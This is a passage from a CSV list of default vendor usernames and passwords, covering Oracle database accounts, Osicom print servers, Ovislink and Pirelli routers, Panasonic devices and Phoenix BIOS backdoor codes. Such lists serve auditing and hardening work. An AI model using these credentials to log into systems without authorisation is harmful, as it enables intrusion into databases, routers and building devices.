RDBMS,7 and 8,Multi,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,7 and 8,Multi,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA,,\noracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,8i WinNT,Multi,RE,RE,,,\noracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA,,\noracle,Oracle RDBMS,8i,Multi,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,8i,Multi,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,8i,Multi,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,8i,Multi,EMP,EMP,,,\noracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA,,\noracle,Oracle RDBMS,8i,Multi,FINANCE,FINANCE,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,FND,FND,,,\noracle,Oracle RDBMS,8i,Multi,GPFD,GPFD,,,\noracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,,,\noracle,Oracle RDBMS,8i,Multi,MFG,MFG,All Privileges,,\noracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,,,\noracle,Oracle RDBMS,8i,Multi,MMO2,MMO2,,,\noracle,Oracle RDBMS,8i,Multi,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,8i,Multi,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,8i,Multi,PO,PO,DBA,,\noracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,8i,Multi,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA,,\noracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,8i,Multi,SYSMAN,oem_temp,DBA,,\noracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,8i,Multi,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,8i,Multi,USER0,USER0,,,\noracle,Oracle RDBMS,8i,Multi,USER1,USER1,,,\noracle,Oracle RDBMS,8i,Multi,USER2,USER2,,,\noracle,Oracle RDBMS,8i,Multi,USER3,USER3,,,\noracle,Oracle RDBMS,8i,Multi,USER4,USER4,,,\noracle,Oracle RDBMS,8i,Multi,USER5,USER5,,,\noracle,Oracle RDBMS,8i,Multi,USER6,USER6,,,\noracle,Oracle RDBMS,8i,Multi,USER7,USER7,,,\noracle,Oracle RDBMS,8i,Multi,USER8,USER8,,,\noracle,Oracle RDBMS,8i,Multi,USER9,USER9,,,\noracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA,,\noracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin,,\noracle,Oracle,,,ADAMS,WOOD,,,\noracle,Oracle,,,ADLDEMO,ADLDEMO,,,\noracle,Oracle,,,ADMIN,JETSPEED,,,\noracle,Oracle,,,ADMINISTRATOR,ADMINISTRATOR,,,\noracle,Oracle,,,ANDY,SWORDFISH,,,\noracle,Oracle,,,AP,AP,,,\noracle,Oracle,,,APPLSYS,FND,,,\noracle,Oracle,,,APPLSYSPUB,FNDPUB,,,\noracle,Oracle,,,APPS,APPS,,,\noracle,Oracle,,,APPUSER,APPUSER,,,\noracle,Oracle,,,AQ,AQ,,,\noracle,Oracle,,,AQDEMO,AQDEMO,,,\noracle,Oracle,,,AQJAVA,AQJAVA,,,\noracle,Oracle,,,AQUSER,AQUSER,,,\noracle,Oracle,,,AUDIOUSER,AUDIOUSER,,,\noracle,Oracle,,,AURORA$JIS$UTILITY$,,,,\noracle,Oracle,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle,,,BC4J,BC4J,,,\noracle,Oracle,,,BLAKE,PAPER,,,\noracle,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,,\noracle,Oracle,,,CATALOG,CATALOG,,,\noracle,Oracle,,,CDEMO82,CDEMO82,,,\noracle,Oracle,,,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle,,,CDEMORID,CDEMORID,,,\noracle,Oracle,,,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle,,,CENTRA,CENTRA,,,\noracle,Oracle,,,CIDS,CIDS,,,\noracle,Oracle,,,CIS,CIS,,,\noracle,Oracle,,,CISINFO,CISINFO,,,\noracle,Oracle,,,CLARK,CLOTH,,,\noracle,Oracle,,,COMPANY,COMPANY,,,\noracle,Oracle,,,COMPIERE,COMPIERE,,,\noracle,Oracle,,,CQSCHEMAUSER,PASSWORD,,,\noracle,Oracle,,,CSMIG,CSMIG,,,\noracle,Oracle,,,CTXDEMO,CTXDEMO,,,\noracle,Oracle,,,CTXSYS,CTXSYS,,,\noracle,Oracle,,,DBI,MUMBLEFRATZ,,,\noracle,Oracle,,,DBSNMP,DBSNMP,,,\noracle,Oracle,,,DEMO8,DEMO8,,,\noracle,Oracle,,,DEMO9,DEMO9,,,\noracle,Oracle,,,DES,DES,,,\noracle,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,,\noracle,Oracle,,,DIP,DIP,,,\noracle,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,,\noracle,Oracle,,,DSGATEWAY,DSGATEWAY,,,\noracle,Oracle,,,DSSYS,DSSYS,,,\noracle,Oracle,,,EJSADMIN,EJSADMIN,,,\noracle,Oracle,,,EMP,EMP,,,\noracle,Oracle,,,ESTOREUSER,ESTORE,,,\noracle,Oracle,,,EVENT,EVENT,,,\noracle,Oracle,,,EXFSYS,EXFSYS,,,\noracle,Oracle,,,FINANCE,FINANCE,,,\noracle,Oracle,,,FND,FND,,,\noracle,Oracle,,,FROSTY,SNOWMAN,,,\noracle,Oracle,,,GL,GL,,,\noracle,Oracle,,,GPFD,GPFD,,,\noracle,Oracle,,,GPLD,GPLD,,,\noracle,Oracle,,,HCPARK,HCPARK,,,\noracle,Oracle,,,HLW,HLW,,,\noracle,Oracle,,,HR,HR,,,\noracle,Oracle,,,IMAGEUSER,IMAGEUSER,,,\noracle,Oracle,,,IMEDIA,IMEDIA,,,\noracle,Oracle,,,JMUSER,JMUSER,,,\noracle,Oracle,,,JONES,STEEL,,,\noracle,Oracle,,,JWARD,AIROPLANE,,,\noracle,Oracle,,,L2LDEMO,L2LDEMO,,,\noracle,Oracle,,,LBACSYS,LBACSYS,,,\noracle,Oracle,,,LIBRARIAN,SHELVES,,,\noracle,Oracle,,,MASTER,PASSWORD,,,\noracle,Oracle,,,MDDEMO,MDDEMO,,,\noracle,Oracle,,,MDDEMO_CLERK,CLERK,,,\noracle,Oracle,,,MDDEMO_MGR,MGR,,,\noracle,Oracle,,,MDSYS,MDSYS,,,\noracle,Oracle,,,MFG,MFG,,,\noracle,Oracle,,,MGWUSER,MGWUSER,,,\noracle,Oracle,,,MIGRATE,MIGRATE,,,\noracle,Oracle,,,MILLER,MILLER,,,\noracle,Oracle,,,MMO2,MMO2,,,\noracle,Oracle,,,MODTEST,YES,,,\noracle,Oracle,,,MOREAU,MOREAU,,,\noracle,Oracle,,,MTSSYS,MTSSYS,,,\noracle,Oracle,,,MTS_USER,MTS_PASSWORD,,,\noracle,Oracle,,,MXAGENT,MXAGENT,,,\noracle,Oracle,,,NAMES,NAMES,,,\noracle,Oracle,,,OAS_PUBLIC,OAS_PUBLIC,,,\noracle,Oracle,,,OCITEST,OCITEST,,,\noracle,Oracle,,,ODM,ODM,,,\noracle,Oracle,,,ODM_MTR,MTRPW,,,\noracle,Oracle,,,ODS,ODS,,,\noracle,Oracle,,,ODSCOMMON,ODSCOMMON,,,\noracle,Oracle,,,OE,OE,,,\noracle,Oracle,,,OEMADM,OEMADM,,,\noracle,Oracle,,,OEMREP,OEMREP,,,\noracle,Oracle,,,OLAPDBA,OLAPDBA,,,\noracle,Oracle,,,OLAPSVR,INSTANCE,,,\noracle,Oracle,,,OLAPSYS,MANAGER,,,\noracle,Oracle,,,OMWB_EMULATION,ORACLE,,,\noracle,Oracle,,,OO,OO,,,\noracle,Oracle,,,OPENSPIRIT,OPENSPIRIT,,,\noracle,Oracle,,,ORACACHE,(random password),,,\noracle,Oracle,,,ORAREGSYS,ORAREGSYS,,,\noracle,Oracle,,,ORASSO,ORASSO,,,\noracle,Oracle,,,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle,,,ORDSYS,ORDSYS,,,\noracle,Oracle,,,OSE$HTTP$ADMIN,(random password),,,\noracle,Oracle,,,OSP22,OSP22,,,\noracle,Oracle,,,OUTLN,OUTLN,,,\noracle,Oracle,,,OWA,OWA,,,\noracle,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,,\noracle,Oracle,,,OWNER,OWNER,,,\noracle,Oracle,,,PANAMA,PANAMA,,,\noracle,Oracle,,,PATROL,PATROL,,,\noracle,Oracle,,,PERFSTAT,PERFSTAT,,,\noracle,Oracle,,,PLEX,PLEX,,,\noracle,Oracle,,,PLSQL,SUPERSECRET,,,\noracle,Oracle,,,PM,PM,,,\noracle,Oracle,,,PO,PO,,,\noracle,Oracle,,,PO7,PO7,,,\noracle,Oracle,,,PORTAL30,PORTAL30,,,\noracle,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,,\noracle,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,,\noracle,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,,\noracle,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,,\noracle,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,,\noracle,Oracle,,,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle,,,PRIMARY,PRIMARY,,,\noracle,Oracle,,,PUBSUB,PUBSUB,,,\noracle,Oracle,,,PUBSUB1,PUBSUB1,,,\noracle,Oracle,,,QDBA,QDBA,,,\noracle,Oracle,,,QS,QS,,,\noracle,Oracle,,,QS_ADM,QS_ADM,,,\noracle,Oracle,,,QS_CB,QS_CB,,,\noracle,Oracle,,,QS_CBADM,QS_CBADM,,,\noracle,Oracle,,,QS_CS,QS_CS,,,\noracle,Oracle,,,QS_ES,QS_ES,,,\noracle,Oracle,,,QS_OS,QS_OS,,,\noracle,Oracle,,,QS_WS,QS_WS,,,\noracle,Oracle,,,RE,RE,,,\noracle,Oracle,,,REPADMIN,REPADMIN,,,\noracle,Oracle,,,REPORTS_USER,OEM_TEMP,,,\noracle,Oracle,,,REP_MANAGER,DEMO,,,\noracle,Oracle,,,REP_OWNER,REP_OWNER,,,\noracle,Oracle,,,RMAIL,RMAIL,,,\noracle,Oracle,,,RMAN,RMAN,,,\noracle,Oracle,,,SAMPLE,SAMPLE,,,\noracle,Oracle,,,SAP,SAPR3,,,\noracle,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,,\noracle,Oracle,,,SECDEMO,SECDEMO,,,\noracle,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,,\noracle,Oracle,,,SH,SH,,,\noracle,Oracle,,,SITEMINDER,SITEMINDER,,,\noracle,Oracle,,,SLIDE,SLIDEPW,,,\noracle,Oracle,,,STARTER,STARTER,,,\noracle,Oracle,,,STRAT_USER,STRAT_PASSWD,,,\noracle,Oracle,,,SWPRO,SWPRO,,,\noracle,Oracle,,,SWUSER,SWUSER,,,\noracle,Oracle,,,SYMPA,SYMPA,,,\noracle,Oracle,,,SYS,D_SYSPW,,,\noracle,Oracle,,,SYSADM,SYSADM,,,\noracle,Oracle,,,SYSMAN,OEM_TEMP,,,\noracle,Oracle,,,SYSTEM,D_SYSTPW,,,\noracle,Oracle,,,TAHITI,TAHITI,,,\noracle,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,,\noracle,Oracle,,,TESTPILOT,TESTPILOT,,,\noracle,Oracle,,,TRACESVR,TRACE,,,\noracle,Oracle,,,TRAVEL,TRAVEL,,,\noracle,Oracle,,,TSDEV,TSDEV,,,\noracle,Oracle,,,TSUSER,TSUSER,,,\noracle,Oracle,,,TURBINE,TURBINE,,,\noracle,Oracle,,,ULTIMATE,ULTIMATE,,,\noracle,Oracle,,,USER,USER,,,\noracle,Oracle,,,USER0,USER0,,,\noracle,Oracle,,,USER1,USER1,,,\noracle,Oracle,,,USER2,USER2,,,\noracle,Oracle,,,USER3,USER3,,,\noracle,Oracle,,,USER4,USER4,,,\noracle,Oracle,,,USER5,USER5,,,\noracle,Oracle,,,USER6,USER6,,,\noracle,Oracle,,,USER7,USER7,,,\noracle,Oracle,,,USER8,USER8,,,\noracle,Oracle,,,USER9,USER9,,,\noracle,Oracle,,,UTLBSTATU,UTLESTAT,,,\noracle,Oracle,,,VIDEOUSER,VIDEO USER,,,\noracle,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,,\noracle,Oracle,,,VIRUSER,VIRUSER,,,\noracle,Oracle,,,VRR1,VRR1,,,\noracle,Oracle,,,WEBCAL01,WEBCAL01,,,\noracle,Oracle,,,WEBDB,WEBDB,,,\noracle,Oracle,,,WEBREAD,WEBREAD,,,\noracle,Oracle,,,WKSYS,WKSYS,,,\noracle,Oracle,,,WWW,WWW,,,\noracle,Oracle,,,WWWUSER,WWWUSER,,,\noracle,Oracle,,,XPRT,XPRT,,,\noracle,Oracle,,,demo,demo,,,\noracle,Oracle,,,internal,oracle,,,\noracle,Oracle,,,oracle,oracle,,,\noracle,Oracle,,,scott,tiger or tigger,,,\noracle,Oracle,,,sys,sys,,,\noracle,Oracle,,,system,manager,,,\noracle,Personal Oracle,,,PO8,PO8,,,\noracle,Personal Oracle,,8,PO8,PO8,,,\noracle,Personal Oracle,8,Multi,PO8,PO8,,,\noracle,Sun Java System Access Manager,,,admin,adminadmin,,,\noracle,Web DB,,,webdb,webdb,,,\noracle,Web DB,,Admin,webdb,webdb,,,\noracle,Web DB,,HTTP,webdb,webdb,Admin,,\norange,livebox,,,admin,admin,,,\nosicom,JETXPrint,,1000E/B,sysadm,sysadm,,,\nosicom,JETXPrint,,1000E/N,sysadm,sysadm,,,\nosicom,JETXPrint,,1000T/N,sysadm,sysadm,,,\nosicom,JETXPrint,,500 E/B,sysadm,sysadm,,,\nosicom,JETXPrint,,Admin,sysadm,sysadm,,,\nosicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETCommuter Remote Access Server,,,Manager,Manager,,,\nosicom,NETCommuter Remote Access Server,,,debug,d.e.b.u.g,,,\nosicom,NETCommuter Remote Access Server,,,echo,echo,,,\nosicom,NETCommuter Remote Access Server,,,guest,guest,,,\nosicom,NETCommuter Remote Access Server,,,sysadm,sysadm,,,\nosicom,NETCommuter Remote Access Server,,Admin,Manager,Manager,,,\nosicom,NETCommuter Remote Access Server,,Admin,sysadm,sysadm,,,\nosicom,NETCommuter Remote Access Server,,Telnet,Manager,Manager,Admin,,\nosicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,echo,echo,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User,,\nosicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin,,\nosicom,NETCommuter Remote Access Server,,User,debug,d.e.b.u.g,,,\nosicom,NETCommuter Remote Access Server,,User,echo,echo,,,\nosicom,NETCommuter Remote Access Server,,User,guest,guest,,,\nosicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,,1000 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,1000 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/B,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/D,Manager,Manager,,,\nosicom,NETPrint,,1000E/D,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1000E/D,echo,echo,,,\nosicom,NETPrint,,1000E/D,guest,guest,,,\nosicom,NETPrint,,1000E/D,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/N,sysadm,sysadm,,,\nosicom,NETPrint,,1000E/NDS,Manager,Manager,,,\nosicom,NETPrint,,1000E/NDS,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1000E/NDS,echo,echo,,,\nosicom,NETPrint,,1000E/NDS,guest,guest,,,\nosicom,NETPrint,,1000E/NDS,sysadm,sysadm,,,\nosicom,NETPrint,,1500 E/B,Manager,Manager,,,\nosicom,NETPrint,,1500 E/B,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1500 E/B,echo,echo,,,\nosicom,NETPrint,,1500 E/B,guest,guest,,,\nosicom,NETPrint,,1500 E/B,sysadm,sysadm,,,\nosicom,NETPrint,,1500E/N,Manager,Manager,,,\nosicom,NETPrint,,1500E/N,debug,d.e.b.u.g,,,\nosicom,NETPrint,,1500E/N,echo,echo,,,\nosicom,NETPrint,,1500E/N,guest,guest,,,\nosicom,NETPrint,,1500E/N,sysadm,sysadm,,,\nosicom,NETPrint,,1500T/N,sysadm,sysadm,,,\nosicom,NETPrint,,2000 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,2000 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,2000E/B,sysadm,sysadm,,,\nosicom,NETPrint,,2000E/N,Manager,Manager,,,\nosicom,NETPrint,,2000E/N,debug,d.e.b.u.g,,,\nosicom,NETPrint,,2000E/N,echo,echo,,,\nosicom,NETPrint,,2000E/N,guest,guest,,,\nosicom,NETPrint,,2000E/N,sysadm,sysadm,,,\nosicom,NETPrint,,500 E/B,sysadm,sysadm,,,\nosicom,NETPrint,,500 E/N,sysadm,sysadm,,,\nosicom,NETPrint,,500 T/B,sysadm,sysadm,,,\nosicom,NETPrint,,500 T/N,sysadm,sysadm,,,\nosicom,NETPrint,,Admin,Manager,Manager,,,\nosicom,NETPrint,,Admin,sysadm,sysadm,,,\nosicom,NETPrint,,User,debug,d.e.b.u.g,,,\nosicom,NETPrint,,User,echo,echo,,,\nosicom,NETPrint,,User,guest,guest,,,\nosicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/D,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1000E/D,Telnet,echo,echo,User,,\nosicom,NETPrint,1000E/D,Telnet,guest,guest,User,,\nosicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1000E/NDS,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1000E/NDS,Telnet,echo,echo,User,,\nosicom,NETPrint,1000E/NDS,Telnet,guest,guest,User,,\nosicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500 E/B,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1500 E/B,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1500 E/B,Telnet,echo,echo,User,,\nosicom,NETPrint,1500 E/B,Telnet,guest,guest,User,,\nosicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500E/N,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,1500E/N,Telnet,echo,echo,User,,\nosicom,NETPrint,1500E/N,Telnet,guest,guest,User,,\nosicom,NETPrint,1500E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,1500T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,2000E/N,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,2000E/N,Telnet,echo,echo,User,,\nosicom,NETPrint,2000E/N,Telnet,guest,guest,User,,\nosicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,500 E/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 T/B,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,Manager,Manager,Admin,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,debug,d.e.b.u.g,User,,\nosicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,echo,echo,User,,\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,Manager,Manager\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,debug,d.e.b.u.g\nosicom,NETPrint,500,1000,1500,and 2000 Series,Telnet,echo,echo\nosicom,NetPrint,500,1000,1500, and 2000 Series,Telnet,guest,guest,User,,\nosicom,NetPrint,500,1000,1500,and 2000 Series,Telnet,guest,guest\nosicom,Osicom Plus T1/PLUS 56k,,,write,private,,,\nosicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,,,\nosicom,Osicom(Datacom),,,sysadm,sysadm,,,\notrs,OTRS,,,root@localhost,root,,,\novislink,1184AR,all,multi,admin,12345,admin,,\novislink,AirLive WIAS-1000G,,console,admin,admin,Admin,,\novislink,BudgeTone 100 series IP Phone,1.1.0.11,,,123,Config (End User),,\novislink,BudgeTone 100 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),,\novislink,BudgeTone 200 series IP Phone,1.1.0.11,,,123,Config (End User),,\novislink,BudgeTone 200 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),Need to get the IP from the phone's display,\novislink,GXP-2000 IP Phone,1.0.1.9,http,,admin,Config (Advanced User),,\novislink,HandyTone-286 analog telephone adaptor,,,,123,config,,\novislink,HandyTone-286 analog telephone adaptor,,,,admin,config,,\novislink,HandyTone-486 analog telephone adaptor,,,,123,config,,\novislink,HandyTone-486 analog telephone adaptor,,,,admin,config,,\novislink,HandyTone-488 analog telephone adaptor,,,,123,Config (End User),,\novislink,HandyTone-488 analog telephone adaptor,,,,admin,Config (Advanced User),,\novislink,HandyTone-496 analog telephone adaptor,,,,123,Config (End User),,\novislink,HandyTone-496 analog telephone adaptor,,,,admin,Config (Advanced User),,\novislink,IWE1100 WLAN to LAN Bridge,,,root,root,Admin,,\novislink,SHDSL Modem,B5.1 5-15-2002,,root,root,Admin,,\novislink,SHDSL Modem,B5.1 5-15-2002,,user,user,Admin,,\novislink,SR200 Router,,console,,,config,,\novislink,SR500 Broadband IP Gateway,5.0 and up,http://192.168.1.254,,,config,,\novislink,WL-1000UR,,http,admin,airlive,admin,,\novislink,WL-1120AP,,Multi,root,,Admin,,\novislink,WL-8000AP Wireless G,,192.168.1.252,12345,12345,Admin,,\novislink,WL-8000AP Wireless G,,http,12345,12345,Admin,,\novislink,evo-w301ar,1,http://192.168.1.1/,1234,1234,,,\novislink,wl-1120ap,,http://192.168.100.252,super,super,,universal password,\npachco,AeGIS 9000,All,Console,,0,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops then enter code.,\npachco,AeGIS 9000,All,Console,,0000,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops,\npacific micro data,MAST 9500 Universal Disk Array,,Admin,pmd,,,,\npacific micro data,MAST 9500 Universal Disk Array,,ESM ver. 2.11 / 1,pmd,,,,\npacificmicrodata,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin,,\npackard bell,PC BIOS,,,,bell9,,,\npackard bell,PC BIOS,,Admin,,bell9,,,\npackardbell,,EasyNote_MX37-U-103SP ,,administrador,1234,,,\npackardbell,,EasyNote_MX37-U-103SP,,administrador,1234,,,\npackardbell,PC BIOS,,,459441,459441,,,\npackardbell,PC BIOS,,Console,,bell9,Admin,,\npackardbell,zg5,,,,,,,\npacketeer,Packetshaper,,,,touchpwd=,,,\npanasonic,CF-27,4,Multi,,,Admin,,\npanasonic,CF-28,,Multi,,,Admin,,\npanasonic,CF-45,,Multi,,,Admin,,\npanasonic,KX-TD1232,,Multi,admin,1234,Admin,,\npanasonic,KX-TDA 100,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TDA 200,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TDA 30,V1.1 2.0 3.0,CONSOLE,,1234,,,\npanasonic,KX-TGP500,,10.1.1.12,admin,adminpass,Admin,,\npanasonic,Network Camera,,,admin,12345,,,\npanasonic,WV-NP240/244,V1.25-V1.50,http://192.168.0.10,admin,12345,,,\npandatel,EMUX,,,admin,admin,,,\npandatel,EMUX,,,admin,admin,,all,\nparallels,Plesk,,,admin,setup,,,\npatton,RAS,,2,monitor,monitor,,,\npatton,RAS,,2,superuser,superuser,,,\npatton,RAS,2,,monitor,monitor,,,\npatton,RAS,2,,superuser,superuser,,,\npbx,PBX (Generic),,,tech,nician,,,\npendo,AL300,,,,admin,Admin,,\npenril datability,vcp300 terminal server,,,,system,,,\npenril datability,vcp300 terminal server,,Admin,,system,,,\npenrildatability,vcp300 terminal server,,Multi,,system,Admin,,\npentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin,,\npentaoffice,Sat Router,,Telnet,,pento,Admin,,\npentasafe,VigilEnt Security Manager,,3,PSEAdmin,$secure$,,,\npentasafe,VigilEnt Security Manager,,Admin,PSEAdmin,$secure$,,,\npentasafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,,\npentasafe,VigilEnt Security Manager,3.0,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,,\nperle,CS9000,any,Console,admin,superuser,Admin,,\nphilips,Praesideo PA System,,Admin,admin,admin,,,\nphilips,Praesideo PA System,,All versions,admin,admin,,,\nphilips,Praesideo PA System,All versions,Multi,admin,admin,Admin,,\nphoenix,4,6.0.2,Multi,,admin,Admin,,\nphoenix,4.0,,Admin,,admin,,,\nphoenix,4.0,6.0.2,Multi,,admin,Admin,,\nphoenix,PC BIOS,,console,,BIOS,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,CMOS,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,PHOENIX,Admin,Default/backdoor CMOS password,\nphoenix,PC BIOS,,console,,phoenix,Admin,Default/backdoor CMOS password,\nphoenix,Phoenix v1.14,,Multi,Administrator,admin,Admin,,\nphpliteadmin,phpLiteAdmin,,,,admin,,,\nphpreactor,PHPReactor,,1.2.7,core,phpreactor,,,\nphpreactor,PHPReactor,1.2.7,http,core,phpreactor,,,\nphptest,phpTest,,0.5.6,admin,1234,,,\nphptest,phpTest,,0.5.6,guest,guest,,,\nphptest,phpTest,0.5.6,http,admin,1234,Admin,,\nphptest,phpTest,0.5.6,http,guest,guest,,,\npirelli,,,,on,on,Admin,Used for OnTelecom,\npirelli,A255G,,http://192.168.1.254,Administrator,CPE.hgw.12,admin (root user),Macedonia,\npirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin,,\npirelli,AGE ADSL Router,,Multi,user,password,User,,\npirelli,DRG A225G,,,3play,3play,admin,,\npirelli,DRG A225G,SAPO,192.168.1.1,user,user,admin,,\npirelli,P.DG A4010G,1,http://192.168.1.1,admin,admin,Admin privilegies,HT Mostar,\npirelli,PRGAV4202N,,10.0.0.138,Telek0m,Austria&Eur0,,for Telekom Austria,\npirelli,PRGAV4202N,,10.0.0.138,Telek0m,AustriaEur0,,for Telekom Austria,\npirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin,,\npirelli,Pirelli AGE-UB,,HTTP,admin,microbusiness,Admin,,\npirelli,Pirelli Router,,Multi,admin,microbusiness,Admin,,\npirelli,Pirelli Router,,Multi,admin,mu,Admin,,\npirelli,Pirelli Router,,Multi,user,password,Admin,,\npirelli,p.dg a4010g,a-000-1a1-a4,http://192.168.1.1,admin,admin,admin,,\npivotalsoftware,RabbitMQ Management 